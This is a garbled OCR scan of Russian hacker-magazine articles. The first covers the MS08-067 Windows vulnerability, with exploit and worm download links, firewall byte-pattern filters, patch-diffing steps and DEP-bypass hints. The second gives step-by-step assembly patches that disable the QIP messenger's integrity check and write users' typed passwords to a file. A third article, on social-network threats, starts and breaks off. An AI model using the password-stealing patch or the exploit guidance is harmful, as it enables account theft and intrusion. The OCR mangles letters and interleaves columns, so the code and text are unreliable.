2. МБ08-067 Ехріоіі Ьу ОеЬазіз МоЬапІу (ака ТгОу/порзІесІ) поражает ѴѴ2К 
и 52КЗІ5Р2], написан на Питоне, даетудаленный шелл: тіІѵѵОгт.сот/ 
ехрІоіІз/7132 . 

3. МБ08-067ЕхрІоіНогСМ ЬуЕММгарЬ4пШт.огд претендует на универ- 
сальность, однако ни наХР, ни на52кЗ в упор не работает. Зато содержит по- 
лезный код, которым мы впоследствии воспользуемся для создания своего 
ехрІоіПа, поражающего все системы: ті[уѵ0тп.сот/зр[оі1:5/2008-М508-067.гаг . 

4. М508-0670іттіѵѴѴогт.А— двоичный файл червя (тре- 
бует предварительной регистрации]: оГепзіѵесотриІіпд.пеі/ 
7д=ос5еагсЬ&осд=б65б1 : 633бс2700б521ае4бГ8с393ЬГ 
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»5оІиІіоп 



МісгобоИ выпустила заплатки для всех операционных систем, но испра- 
вила лишь часть ошибок, а потому установка пакета обновления (который 
можно добыть на тісгозоГ.сот/іесЬпеі/зесипІѵ/ВииеІіп/тзОб-ОбЗ.тзрх ) 
блокируеттолько первое поколение червей, но не спасает против целевых 
атак. Закрытие 139 и 445 портов на брандмауэре надежнозащищаетнас 
от вторжения, но разделяемые ресурсы при этом становятся недоступны- 
ми. Приходится не по-детски извращаться, создавая сложные правила 
фильтрации трафика, основанные на поиске последовательностей «5с 
00 2е 00 2е 00 5с 00» («\..\»),«2Г 00 2е 00 2е 00 21 00» («А.»], «5с 00 2е 00 2е 
00 2100» («\../») и «5с 00 2е 00 2е 00 26 00» («/..\»). Ну а для тестирования 
брандмауэра можно воспользоваться моей утилитой ( крпс.ога/11р/М508- 
067.гір . пароль «1 23456»]. Она инсценирует атаку на НРС и выбрасывает 
внутри сервиса 5РѴ5ѴС необрабатываемое исключение, приводящее к 
его гибели (вместе с дырой). Правильно сконфигурированный брандмауэр 
блокирует посылку пакетов, и сервис продолжает работать даже после 
запуска программы. 



» ОІ5СІ05Ѳ 



А сейчас мы будем хакерствовать, демонстрируя методики скоростного 
поиска дыр и исправления ошибок в вирусах/ехріоібах. Ведьмыже хотим 
атаковать нетолько хрюшу, установленную на древнем ЦП с исполняемым 
стеком, но и современные системы, верно? А как будем атаковать? При- 
творимся, что мы ничего незнаем о дыре — типа никакихстатей не читали, 
червей не дизассемблировали и даже исходные тексты ехріоібов не листали. 
Представим, чтоу нас естьтолько бюллетень безопасности от МісгозоИ, из 
которого ничего понять невозможно. Типа, где-то там в ПРО есть дыра, но что 
за дыра, и где именно ее искать — кто же нам это скажет! Ничего не остается, 
кроме какзапасаться пивом и добывать недостающую информацию само- 
стоятельно. Самое простое — скачать «заплатку» от Місгозоіі и посмотреть, 
что именно было исправлено, сравнив ее с непатченным оригиналом. 
Различные системы имеют различные дыры, и потому для полноты картины 
необходимо исследовать все заплатки, начиная с\А/2К и заканчивая 52к8. 
Посколькутехника анализа во всех случаях полностью идентична, проде- 
монстрируем ее на примере ѴѴ2 К, обновление для которой упрятано в ис- 
полняемый файл ѴѴіпбоѵѵ52000-КВ958644-х86-ПІІ5.ЕХЕ, представляющий 
собой самораспаковывающийся САВ-архив. Какдобытьиз негоактуаль- 
ные файлы? Загружаем ехе в НІЕѴѴ, ищем сигнатуру «М5СР». После чего 
выделяем блоки копируем его в .саб, распаковываемый штатной ѴѴіпсІоѵѵз- 
утилитой сотргезз. ехе либо РАР’ом, извлекающим на свет божий пе1арі32. 



Голова червя Оіттіѵ.А, вызывающая переполнение стека путем посылки 
команды ЦІЧеіРаІІпСапопісаІіге, принимающей в качестве аргумента сетевое 
имя с магической последовательностью «\. А» 

611, в которой и сосредоточены все исправления. Примечание: для ХР данная 
техника уже не работает, но можно схитрить — запустить ехе без прав ад- 
министратора и, получив сообщение об ошибке, вытащить распакованные 
инсталлятором файлы из временной папки. Затем нажать на «ОК», позволяя 
инсталлятору уда лить их обрати о. 

Теперь нам потребуется ЮА-Рго и утилита для сравнения патчей — коммер- 
ческий ВіпОіГГ или же бесплатный РаІсШііб, причем качество последнего 
ничутьнехуже, и я им вполне доволен: ЫірТ/саіТепаЫезесигіІѵ.сотАепаЫе/ 
раІсбсШ.рІір . 

Переименовываем оригинальный пеСарі32 .<111 в пеСарі32_о.<111, 
грузим в ЮА-Рго и дожидаемся завершения дизассемблирования. 
Закрываем базу, загружаем исправленный пеЕарі32 .<311 (переимено- 
ванный в пеСарі32_р.<31і), дизассемблируем, после чего лезем в меню 
Е6іі\РІид-іпз, находимтам РаІсШііІ и указываем ему пеСарі32_о . ісіЬ. На 
удивление, РаІсІЮіГ генерирует довольно чистый отчет, содержащий всего 
21 функцию. Практически все функции несут на своем борту актуальные 
изменения, которые удобнее всего просматривать в графическом режиме 
(контекстное меню -> пункт«0гарб»]. В частности, сравнение оригиналь- 
ной и пропатченной функции «І_ЫеСРаСЬСапопіса1І2е» выглядиттак 
(смотри рисунок]. 

Измененный код находится в красных блоках. Чтобы ихувеличить — жмем 
«1». Чтобы перейти кдизассемблерному коду — щелкаем правой кнопкой - 
мыши и выбираем пункт«3итр Іо Собе» в контекстом меню. 

Оригинальная пе(арі32.сНІ 



7СБ1ААЗЕ 


ризі 


0 


; сЪаг 


7СБ1АА40 


Іеа 


еах. 


[ еЪр+ШсЗегѵегЕате ] 


7СБ1АА46 


ризі 


еах 


; БезС 


7СБ1АА47 


Іеа 


еах, 


[еЬр+ѵаг_2 0 ] 


7СБ1АА4А 


ризі 


еах 


; іпВ 


7СБ1АА4В 


ризі 


[еЪр+ВиВВег] ; ВиВВег 


7СБ1АА4Е 


ЫеСрІзКетоСе 




Пропатченная пе1арі32.сіи 






7СБ1ЕВ7Б 


ризі 


0 


; сіаг 


7СБ1ЕВ7Е 


ризі 


1041т 


; іпВ 


7СБ1ЕВ84 


Іеа 


еах, 


[еЪр+ІІпсЗегѵегБате] 



► 046 
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Распаковка заплатки от М5 с помощью НІЕѴѴ’а 



7СБІАВРЕ стр ах, зі 

7СБІАС01 32 1ос_7СБІЕВІ7 

7СБІАС07 1ос_7СБ1АС07 : 

; СОБЕХКЕР: зиЬ_7СБІАВБ9 + ЗР51ѵ 
7СБ1АС07 БезС ах, ах 

7СБ1АС0А тоѵ езі, есіі 

7СБ1АС0С 32 зЬогС 1ос_7СБІАС2В 

7СБ1АС0Е 1ос_7СБ1АС0Е : 

; СОБЕХКЕР: зиЬ_7СБІАВБ9 + 60ѵз 











7СБ1АС0Е 


стр 


ах, Ьх 


7СБ1РВ8А 


ризЬ 


еах 


; БезБ 


7СБ1АС11 


32 


1ос_7СБ273А8 


7СБ1РВ8В 


Іеа 


еах, [еЬр+ѵаг_20] 




7СБ1АС17 


стр 


ах, 1 . 1 


7СБ1РВ8Е 


ризЬ 


еах 


; іпБ 


7СБІАСІВ 


32 


1ос_7СБ273ВВ 


7СБ1РВ8Р 


ризЬ 


[еЪр+Виііег] 


; Виііег 








7СБ1РВ92 


саіі 


БеСрІзКетоСе 




Какследствие, уязвимость распространяется на 



Ага! В оригинальной версии вызывается функция 
ЫеСрІзКетоСе (ВиТТег , іпС , БезС , сЬаг) , а в исправленной 
— ЫеСрІзКетоСе (ВиТТег , іпЬ , БезС , сЬаг, 0x104). Как 
нетрудно догадаться, 0x104 — максимально допустимый размер 
буфера, предотвращающий переполнение. Остается только выяс- 
нить, где происходит переполнение. А происходитоно в функции 



ЫеСрмРаЦЬСапопісаІіге ( ) , вызывающей в свою очередь функцию 
зиЬ_7СБІАВ2 8 , ключевой фрагмент которой приведен ниже: 


Уязвимый код, вызывающий переполнение буфера 




7СБІАВ53 


ризЬ 


[еЬр+Зоигсе] 


ЗСг 


7СВ1АВ56 


саіі 


е<іі 


ітр_члгс з 1 еп 


7СБ1АВ5В 


стр 


еах, еЬх 




7СБ1АВ5Б 


За 


зЬогС 1ос_7 СБІАВСР 




7СБ1АВ5Р 


ризЬ 


[еЬр+8оигсе] 


Зоигсе 


7СБ1АВ68 


ризЬ 


еах 


БезБ 


7СБ1АВ69 


саіі 


сЗ.3 : ітр_ѵ\гсзсаС 




7СБ1АВ8Б 


Іеа 


еах, [еЬр+ЗБг] 




7СБ1АВ93 


ризЬ 


еах 




7СБ1АВ94 


саіі 


зиЬ_7 СБ1 АВБ9 




7СБ1АВ9Б 


Іеа 


еах, [еЬр+ЗБг] 




7СБ1АВАЗ 


ризЬ 


еах 


ЗСг 


7СБ1АВА4 


саіі 


есіі 


ітр_ѵ\гсз1еп 


7СВ1АВА6 


Іеа 


еах, [еах+еах+2] 




7СБ1АВВ4 


Іеа 


еах, [еЬр+ЗБг] 




7СБ1АВВА 


ризЬ 


еах ; 


Зоигсе 


7СБІАВВВ 


ризЬ 


[еЬр+БезБ] 


БезБ 


7СБІАВВЕ 


саіі 


сіз : ітр_ѵ\гсзсру 





В глаза сразу бросается «сладкая парочка» — мсзіеп ( )/отсзсру ( ) . Она 
характерна для Ьид-ітее программ, но в нашем случае явная проверка длины 
строки перед копированием от переполнения не спасает, поскольку функция 
ищетсимволы «/», «\» и «.», удаляя последовательности а-ля «\..\» и ошиба- 
ясь в коррекции размеров буфера: 

Функция «нормализации» сетевых имен 

7СБ1АВБ9 зиЬ_7 СБ1 АВБ9 ргос пеаг 

; СОБЕХКЕР: зиЬ_7СБ1АВ28 + 6С А р 



вающие зиЬ_7СБ1АВБ9 ( ) для нормализации имен. Таких функ- 
ций достаточно много. Существующие черви и ехрІоіКы используют 
всего два метода службы 5РѴ5ѴС — і_ЫеСРаСІіСапопіса1І2е и 
і_ЫеСРаСІіСотраге. Однако, в нашем распоряжении есть другие. Вот 
полный списокуязвимых методов, доступных для непосредственного 
вызова через сетевой интерфейс 4В324РС8-1670-0ІБЗ-1278- 
5А47ВР6ЕЕ188: 

І_БеЦРаС]тТуре ; 

І_БеБРаБЪ.Сотраге ; 

І_БеЦБатеѴа1ісіаРе ; 

І_БеЦБатеСотраге ; 

І_ЫеЦБізССапопіса1І2е; 

І_ЫеБРаЦ]тСапопіса1І2е 

І_ЫеББатеСапопіса1І2е; 

І_БеЦ8егѵег8еСЗегѵісеВіЦз ; 

І_БеЦ8егѵег8еСЗегѵісеВіЦзЕх; 

Для эксплуатации уязвимости необходимо внедрить в сетевое имя 
(передаваемое функции в качестве аргумента] последовательность 
«\..\» или же что-нибудь в этом роде — «/../», «/. А», «V./» (последние 
две конструкции поддерживаеттолько 52кЗ/52к8]. Механизм вызова 
методов обозначенного сетевого интерфейса долгое время оставался 
недокументированным, и хакерам приходилосьтерзать исходные 
тексты Самбы. Теперьже достаточно сходить на М50ІЧ, где выложе- 
ны примеры взаимодействия со службой 5РѴ5ѴС и описаны опкоды 
некоторых методов: тзсІп.ппісго501 : Рсопп/еп-и5/[іЬгагѵ/сс21 3209. 
азрх . Попытка найти недостающие опкоды в неофициальной до- 
кументации ( ЬзсОг/геззоигсез/агІісІез/ѵѵіп пеі згѵ/тзгрс згѵзѵс. 
ЫтІІ также не дает результата. Ну не дает — и не надо! Нам хватит и 
документированных функций. Чтобы реализовать атаку, необходимо 
решить две проблемы — передать управление на зНеІІ-код и обойти 
защиту от исполнения кода в стеке. В классическом варианте задача 
решается путем помещения в адрес возврата указателя на инструк- 
цию БМР ЕЗР/САББ ЕЗР (ЕЕЕ4Ь./ЕЕБ4Ь.) , которую МОЖНО найти 
как в пеСарі3 2 . 011, так и в остальных системных библиотеках. 
Естественно, адреса привязаны к конкретной версии ѴѴіпбоѵѵз, что 
делает атакующий код непереносимым. Однако можно найти и такие 
последовательности байт, которые справедливы более чем для одной 



7СБ1АВБ9 

7СБІАВЕ0 


тоѵ 


есіі, [езр+14Ь+агд_0] 


версии операционной системы. Достаточно воспользоваться онлай- 
новым мастером, «крышуемым» МеІазроіЕом. Но это будет работать 


7СБ1АВЕ4 


ризЬ 




при выключенном ОЕР’е, а у большинства пользователей он включен, 


7СБ1АВЕ6 


рор 


езі 


и для борьбы с защитой приходится заносить в стек адреса АРІ-функ- 


7СВ1АВЕ7 


хог 


есіх, есіх 


цийтипа ѴігСиаІАІІос или ѴігСиаІРгоСесС , создающие блоки 


7СБ1АВЕ9 


тоѵ 


ах , [ есіі ] 


с атрибутами «исполняемый» (подробности — в Соодіе по запросу 


7СБІАВЕС 


ризЬ 


’Ѵ 


геСигп2 ІіЬс]. 


7СБІАВЕЕ 


рор 


еЬх 


Точить свой ехріоіі с абсолютного нуля — необязательно. Проще 


7СБІАВЕР 


хог 


еЬр, еЬр 


доработать уже имеющиеся. Естественно, для этого нужно не только 


7СБ1АВР1 


стр 


ах, Ьх 


знать Си и/или Питон, но и разбираться в збеіі-кодах, что и пред- 


7СБ1АВР4 


тоѵ 


[езр+14Ь+ѵаг_4 ] , есіх 


ставляет основную проблему. А ключевой фрагмент эксплойта ты 


7СБ1АВР8 


32 


1ос_7СВ1ЕВ17 


можешь найти на нашем 0Ѵ0. ц-ц 
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НИЗКОУРОВНЕВОЕ ИССЛЕДОВАНИЕ ПОПУЛЯРНОГО ИНТЕРНЕТ-ПЕИДЖЕРА 




йХХй Ж „ М ЛѴ ^ 

«Топовые» программные продукты, распространяемые на бесп латной 

ве, зачастую пользуются такой популярностью, что пользователи доверяют 



их авторам всецело, совершенно забывая о собственной безопасности. 






І 



С^Я) 



г™ 



тобы разрушить весьма распространенный ми 



ф о 



егв 

том, что «популярно 



— значит надежно», мы займемся исследованием раскрученного на те 



тории СНГ интернет-пейджера 0| Р. 



у 







Н ПРОБИВАЕМ «НЕПРОБИВАЕМУЮ» БРОНЮ 

В одном из выпусков рубрики «ЕазуЬаск» я рассказывал, как модифи- 
цировать 01 Р та к, чтобы он выдавал введенный пароль при помощи 
использования МеззадеВохА. Естественно, я не стал раскрывать все 
карты сразу и описывать обход защитных механизмов — исключительно 
для того, чтобы разработчики залатали дыры, а хакеры не использовали 
информацию в корыстных целях, для создания «нового релиза» 01 Р с 
функцией воровства аккаунтов. 

Прошло достаточно времени, и я решил углубиться в увлекательную 
исследовательскую работу. Вместе стобой мы попробуем пропатчить 
цір.ехе таким образом, чтобы он записывал введенные пользователем 
пароли в файл. 

Все действия будем выполнять при помощи, я думаю, хорошоуже извес- 
тного тебе отладчика ОНуйЬд. Итак, вооружаемся отладчиком, релизом 
01 Р и погружаемся в работу. 

Открываем файл под отладчиком. Если ты помнишь, я уже исследо- 
вал 01 Р и выяснил, что существует некоторая защита от модификации 
исполняемого файла. Продемонстрировать наличие некоторой функции, 
проверяющей целостность файла, довольно легко: замени какую-либо 
инструкцию в середине кода программы на пор и попробуй запустить 
программу. Вместо привычного окна авторизации появится сообщение 
отом, что файл поврежден. Попробуем излечить нашего «пациента» от 
этой «болезни» :]. 

Прежде всего, чтобы интернет-пейджер «принял» добавляемый нами 
в РЕ-файл код (а мы его, безусловно, добавим] в качестве своего собст- 
венного, необходимо отключитьзащитные механизмы. После недолгой 
трассировки кода измененного файла я выяснил, «где собака зарыта»: 
по адресу 068Е4ВА располагается процедура проверки целостности РЕ- 



файла. Она портит нам настроение, поэтому рекомендую ее исследовать. 
Пошаговое выполнение программы доводит нас до любопытного места: 

0048023Р . 8В45 ЕС МОѴ ЕАХ,ШОШ) РТЕ 38: [ЕВР-4] 

00480242 . 807Б ЕВ 00 СМР ВУТЕ РТК 88 : [ЕВР-5] , 0 

00480246 74 0Р ЦЕ ЗНОКТ дір_шосіі . 004 802 57 

00480248 Е8 В740Р8РР САШ дір_тос1і . 004043 04 

Мы незнаем, что именно проверяет доблестный интернет- пейджер 
внутри вызываемой функции, да это для нас и не столь важно. Ставим 
точку останова на 00480246 и до умопомрачения жмем на <5ЫЙ+Е9>. 
Программа запустится и выдаст безрадостное окошко: файл поврежден. 
Методом «научного тыка» я выяснил, что если четыре раза нажать на 
<5ЫЙ+Е9> во время прерывания на точке останова, а перед пятым нажа- 
тием — занопить вызов «САЬЬ 00404304», программа запустится (при 
условии, что после пятого прохода мы снова восстановим вызов при помо- 
щи команды контекстного меню«11пс1о5е1есйоп»]. В отладчике все просто 
— заменяем вызов на пор после четырех нажатий на <бЫЙ+Е 9>. Затем сно- 
ва жмем <бЫЙ+Е 9>, щелкаем правой кнопкой по вызову, выбираем « И п сі о 
Зеіесбоп», убираем точку останова и запускаем программу на исполнение. 
Но как пропатчить код, чтобы он «знал», когда защитная процедура 
вызывается в четвертый раз? Писатьогромные проверки со счетчиками 
запуска — сложно и долго. 

Выход только один, и он достаточно очевиден. Скорее всего, содержи- 
мое регистров процессора во время каждого из вызовов — уникально. 
Это значит, мы можем проверять какой-либо регистр на соответствие не- 
которому значению непосредственно перед вызовом защитной функции 
и, если значения совпадают, пускать защитулесом! 
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Вся информация, 
которая содержится 
в статье, предостав- 
ляется исключи- 
тельно для указания 
на уязвимости и не 
является руководс- 
твом кдействию. 

За незаконные 
действия, выполнен- 
ные с применением 
материалов данной 
статьи, ни редакция, 
ни автор ответствен- 
ности не несут. 
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Сейчас код обхода процедуры контроля целостности выполнит свою задачу 



Какудалось выяснить, в моем случае содержимое регистра евх (я взял 
его, что называется, «от балды»; ты можешь проверять любой другой 
регистр) перед пятым вызовом защитной функции равно 0064ЕВ7С. 
Перед тем, как писать код, обходящий защиту, определимся с его место- 
положением. Будем пихать наш «жучок», начиная садреса 0068Е857. 
Вызов защитной функции, располагающийся по адресу 00480248, 
заменим на безусловный переход к нашему коду. 



минимум, о двух АРІ-функциях: создающей файл и записывающей в него 
информацию. Порыскав в М50ІЧ, находим необходимую информацию. 
Для создания файла будем использовать функцию СгеаВеЕіІеМ. Она 
принимает следующие параметры (расположу их в обратном порядке 
— в том, в котором мы будем помещать их в стек): 



00480248 зшр 0068Е857 



Кстати, заметь, что следующая инструкция располагается по адресу 
00480240 — этот факт нам еще пригодится. Вот как будет выглядеть наш 

КОД: 



ЪТетрІабеРіІе — файл-шаблон, атрибуты которого будут 
использоваться для открытия; 

АббгіЪибез — атрибуты и флаги для открытия файла; 

Мосіе — режим открытия файла; 
рЗесигібу — атрибуты безопасности; 

ЗЪагеМосІе — режим совместного доступа; 

Ассезз — тип доступа к файлу; 



0068Р857 СМР ЕВХ, 0064ЕБ7С ; сравниваем содержи- 
мое еЬх со значением, которое должно содержаться |Сод, который снимает за щиту, читает пароль из памяти и записывает его в файл 

в нем перед пятым вызовом защитной функции 



0068Е85Б ЛМ2 0068Е864 ; если содержимое регис- 
тра не равно 00 64ЕБ7С, выполняем переход. . . 

006 8Е85Е ЛУП? 0048024Б ; . . .иначе — не выполняем 
функцию (передаем управление рір.ехе) 

006 8Е864 РІІЗН 0048024Б ; кладем в стек адрес 
возврата из функции. . . 

0068Е869 ЛУП? 00404304 ; . . .и выполняем эту 
функцию 



Простой код обходит мудреную защиту, и теперь мы можем 
беспрепятственнотворить все, что захотим! Все подводные 
камни устранены, а широкий путь для творческих походов 
расчищен: никто и ничто не мешает нам изменять «внутрен- 
ности» интернет-пейджера. 



Н ЛИРИЧЕСКОЕ ОТСТУПЛЕНИЕ 

Если ты еще не забыл, наша задача — написать код, кото- 
рый будет сохранять введенный пользователем пароль в 
файл. Для этого необходимо владеть информацией, как 
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Некоторые параметры можно обнулить (об этом мы поговорим позже]. 
Для записи в файл воспользуемся функцией ѴѴгііеЕіІе. Вотее прототип: 



ВООБ ЖБАРІ БгіБеЕі1е( 

іп НАБББЕ ЬЕіІе, 

іп БРСѴОІБ ІрВиББег , 

іп ВѴЮКВ пБитЪегОБВуБезТоШгіБе , 

оиБ_орБ БРВШКБ ІрБитЬегОБВуБезБгіББеп , 

іпоиБ_орБ БРОѴЕКБАРРЕБ ІрОѵегІарреб 



Параметры будут следующими: 



3. Передадим в стек параметры для функции ѴѴгііеРіІе и вызовем ее. 
Ксожалению, есть один нюанс, который не позволит нам использо- 
вать стек в качестве буфера для этой АРІ-функции: ее вызов затирает 
часть необходимых данных, хранящихся там. Поэтому роль буфера 
будет играть часть секции кода, начиная садреса 0068Р8ЕВ. Нотак 
каксекция кода защищена отзаписи, придется вызвать функцию 
ѴігБиаІРгоБесБ С параметром БечлРгоБесБ = РАОЕ_ЕХЕСБТЕ_ 
КЕАБШІТЕ. Вызов ѴігБиаІРгоБесБ с передачей параметров 
разместим по адресу 0068Е8В7 (предварительно сохранив регистры 
при помощи ризнаб). После чего при помощи набора инструкций моѵ 
скопируем пароль, расположенный в стеке, в наш буфер — по адресу 
0068Е8ЕВ. Все вместе это выглядиттак: 



ЪРіІе — дескриптор файла; 

Ви^^ег — буфер, из которого будут записаны данные; 
пЫитЪегОііВуБезТоКеасІ — количество записываемых данных; 
ІрБиіпЪегОііВуБезКеасІ — количество фактически записанных 
данных ; 

ІрОѵегІарресІ — указатель на структуру типа ОѴЕКБАРРЕБ 
(обнуляем) . 

Условимся, что наш код будет располагаться, начиная с адреса 
0068Р86Е. Теперь необходимо сделать небольшое лирическое отступле- 
ние. Какбыло выяснено в результате долгих исследований (если хочешь 
знать, каких конкретно, почитай колонку ЕАВУНАСКза ноябрь 2008 года], 
после вызова следующего кода, который выполняется при нажатии на 
кнопку «Подключиться», в стеке (по адресу [еЬр-8]] находится пароль: 



; передаем параметры для БгіБеЕіІе и вызываем ее: 

0 068Е8 8В РБЗН 0 ; I /рОѵегІарреб = МБББ 

0068Е88Б РБЗН ЕВР ; | | рВуБезБгіББеп 

0068Е88Е РБЗН 10 ; I I пВуБезТоБгіБе = 10 (16.) 

0068Е890 РБЗН дір_тобі . 0068Е8ЕВ 

; I ІВиііег = дір_тос!і . 0068Е8ЕВ 
0 068Е895 РБЗН ЕАХ ; ІЩЕіІе 

0068Е896 САББ кегпе132 . ШгіБеЕіІе ; | \№гіБеЕі1е 

; вызываем СІозеНапбІе для закрытия файла, хэндл файла мы 
передали выше при помощи инструкции "РБЗН ЕАХ" , располо- 
женной по адресу 0068Е88А: 

0068Е89В САББ СІозеНапбіе 



00649А01 САББ дір. 004678В4 

00649А06 СМР ВШКВ РТК. 33 : [ЕВР-8] , 0 

00649А0А БЕ ЗНОКТ 0649А2Е 

Как видишь, код, расположенный после САИ-а, проверяет, пусто ли 
поле для ввода пароля (пара инструкций — «стр» и «]е»). Нам эта про- 
верка не нужна, такчто на помойку ее — и заменим на переход кнашему 
коду: 



; Восстанавливаем регистры, которые сохраним до вызова 
ѴігБиаІРгоБесБ чуть ниже: 

0068Е8А0 РОРАБ 

; Переходим к коду дір . ехе 

0068Е8А1 БМР дір_шобі . 00649А0В 



00649А01 САББ дір_шобі . 004678В4 

00649А06 БМР 0068Е86Е 

00649А0В ЮР 

г ТРИ ПРОСТЫХ ШАГА К КРАЖЕ ПАРОЛЯ 

Внес изменения? Едем дальше. Перейдем кадресу 0068Е86Е и напи- 
шем наш код. 

1. Передаем параметры для СгеаБеЕіІеМ в стеки вызываем эту функ- 
цию. Вызванная АРІ возвратитв ЕАХ хэндл открытого файла. 



0068Е86Е > 6А 00 РБЗН 0 

0068Е870 . 68 80000000 РБЗН 80 

0068Е875 . 6А 04 РБЗН 4 

0068Е877 . 6А 00 РБЗН 0 

0068Е879 . 6А 03 РБЗН 3 ; 

КЕАБ | ЕІБЕ_ЗНАКЕ_ШІТЕ 

0068Е87В . 68 000000С0 РБЗН С0000000 

СЕБЕКІС_КЕАБ | СЕБЕКІС_ШІТЕ 

0068Е880 . 68 А7Е86800 РБЗН дір_тобі . 0068Е8А7 

ІРіІеБате = " Іод.БхБ" 

0068Е885 . Е8 Б60Е187С САББ кегпе132 . СгеаБеЕіІеМ ; 

ХСгеаБеЕіІеТБ 



/Ь.Тешр1аБеЕі1е = ББББ 
I АББгіЬиБез = ЖЖМАБ 
ІМобе = ОРШ_АБМАТЗ 
I рЗесигіБу = ББББ 
ЗПагеМобе = ЕІБЕ_ЗНАКЕ_ 

ІАссезз = 



; имя файла, которое использует функция СгеаБеЕіІеМ: 
0068Е8А6 БОР 

0068Е8А7 ББІСОБЕ "1од.БхБ",0 



; сохраним регистры в стек : 

0068Е8В7 РБЗНАБ 

; передадим необходимые параметры функции ѴігБиаІРгоБесБ 
и вызовем ее: 

0068Е8В8 РБЗН 32Е7Б0 

; /рОІБРгоБесБ = 0032Е7Б0 
0068Е8ВБ РБЗН 40 

; I Беѵ^РгоБесБ = РАСЕ_ЕХЕСБТЕ_КЕАБШЗІТЕ 
0068Е8ВЕ РБЗН ОЕЕ 

; I Зізе = ЕЕ (255 . ) 

0068Е8С4 РБЗН дір_тобі . 0068Е8ЕВ 

; ІАббгезз = дір_шобі . 0068Е8ББ 
0068Е8С9 САББ кегпе132 . ѴігБиаІРгоБесБ 
; ХѴігБиаІРгоБесБ 



2. Положим в стек содержимое регистра ЕАХ в качестве единственного 
параметра для функции закрытия файла СІозеНапсІІе, которую вызовем 
впоследствии. 




; В два подхода переместим восьмибайтовый пароль в новый 
буфер, начинающийся с адреса 0068Е8ЕВ: 



; первый подход — забираем 4 байта. . . : 
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0068Р8СЕ МОѴ ЕСХ , БШЖБ РТЕ. БЗ : [ЕВР-8] 

0068Р8Б2 МОѴ ЕБХ , БШРБ РТР БЗ : [ЕСХ] 

006 8Е8Б4 МОѴ ЕСХ , дір_тос!і . 0068Е8ЕВ 
006 8Е8Б9 МОѴ БШРБ РТК БЗ : [ЕСХ] , ЕБХ 

; . . .и второй — забираем оставшиеся 4 байта: 

006 8Е8ВВ МОѴ ЕСХ , БШРБ РТР БЗ : [ЕВР-8] 

006 8Е8ВЕ МОѴ ЕБХ, БШРБ РТР БЗ : [ЕСХ+4] 

0068Е8Е2 МОѴ ЕСХ , дір_тобі . 0068Е8ЕЕ 
006 8Е8Е7 МОѴ БШРБ РТР БЗ : [ЕСХ] , ЕБХ 

; передаем управление чуть выше — в начало написанного 
нами кода, который создаст и сохранит лог-файл: 

0068Е8Е9 БМР ЗНОРТ дір_тосІі . 0068Е86Е 

Ситуация немного изменилась. Раньше мы планировали передавать 
управление на наш код следующим образом: 

00649А06 БМР 0068Е86Е 

Теперь это невозможно, так как нам пришлось использовать дополни- 
тельный код в виде вызова ѵігЦиаІРгобесС, который должен непре- 
менно выполняться раньше остального кода. Такчто переходи кадресу 
0068Р8Е9 и меняй расположенный там переход на: 



Все готово! Резюмируем, что было написано выше. Внедренные 
нами инструкции создают файл в директории программы и при 
помощи вызова ѴігЦиаІРгобесС разрешают запись в секцию кода, 
часть которой используется в качестве буфера. Азатем — вызывают 
функцию Мгі б еРіІе, которая записывает в созданный файл полу- 
ченный пароль, введенный пользователем. Как видишь, код не так 
сложен. Тем не менее, защитные механизмы отключены, и пароль 
записан в файл . 

Н РАЗРАБОТЧИКИ, БУДЬТЕ ВНИМАТЕЛЬНЫ! 

Скажу несколько вещей, не особенно приятных для разработчика ин- 
тернет-пейджера, но необходимых. Во-первых, механизмы защиты 
данных учетных записей, находящихся в памяти, нуждаются в до- 
работке. Во-вторых, механизмы контроля целостности файла также 
нуждаются в дополнительном усовершенствовании. Что важно, мы 
рассмотрели самый тривиальный способ модификации. Междутем, 
нужно дописать лишь несколько десятков строк кода, чтобы получить 
версию 01 Р, которая будет открывать интернет-соединение и отправ- 
лять данные учетных записей по Сети. Только представь ситуацию: 
раскрученный интернет-портал, на который залита «новая» версия 
01 Р, может быть, содержащая новый пакет смайлов и несколько 
«модифицированный» код выполнения авторизации. Как следствие 
— тысячи (возможно, десятки тысяч) украденных аккаунтов. Напос- 
ледок — скажу, что многие из популярных программных продуктов 
имеют не менее шокирующие уязвимости. Посему мы еще не раз 
встретимся на страницах журнала и распотрошим не один десяток 
самых скачиваемых программ. Удачи во взломах! ИНИ 
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В СЕТЯХ 




ХАКЕРСКИМ ВЗГЛЯД НА СОЦИАЛЬНЫЕ СЕТИ 



|ВВ5, чаты, фору мы и вот — в топе сезона социальные сети. Что ж, мода ме-| 
Іняется, вполне закономерный процесс. Социальные сети переста ли быть | 

ши. И человек стал намноі 
|го уязвимее. Например, для такого хакера, как ты.| 



а первый взгляд, что может быть лучше? Теперь не нужно 
обзванивать десятки одноклассников в поискахзатеряв- 
шегося товарища из параллельного класса или перерывать 
справочники в надежде наткнуться на бывших однокурс- 
ников. Достаточно зайти на соответствующий ресурс и вуа-ля — инфор- 
мация утебя в кармане. Казалось бы, причин для беспокойства нет. Но 
один за другим следуютзаявления представителей власти отом, что 
социальные сети будут использоваться для поиска недобросовестных 
заемщиков, злостных неплательщиков и прочих категорий граждан. Так 
что же насждет: онлайн-комьюнити или очередное средство тотального 
контроля со стороны государства? И что таят в себе социальные сети? 
Ответы на эти вопросы ты не найдешь в моей статье. Я лишь покажу 
тебе, где — правда, а где — ложь. Приступим к разбору полетов! 



Н ВСЕГДА НАЧЕКУ 

Чего же стоит опасаться при регулярном общении в социальных сетях? 
Однозначно ответить на этот вопрос нельзя, так какой напрямую связан 
стобой итвоим образом жизни. Поэтомуя приведу перечень возможных 
угроз с кратким пояснением, а ты уже выбирай сам, чего стоит опасаться, 
а чего — нет. Итак: 

1. Сбор личных данных о тебе (речь идет о той инфе, которую многие 
опрометчиво постят в своем профиле: рабочие ники, реальные номера 
своихтелефонов, имена, адреса, место учебы/работы идалее посписку]. 
Здесь все зависит оттого, кто можеттобой интересоваться и какие дан- 
ныеосебеты оставил. Каквариант— вбитьлевую инфу. 

2. Вербовка дропов (в последнее время участились случаи предложения 
«полулегальной» работы на просторах Вконтакте, а попросту — поиски 
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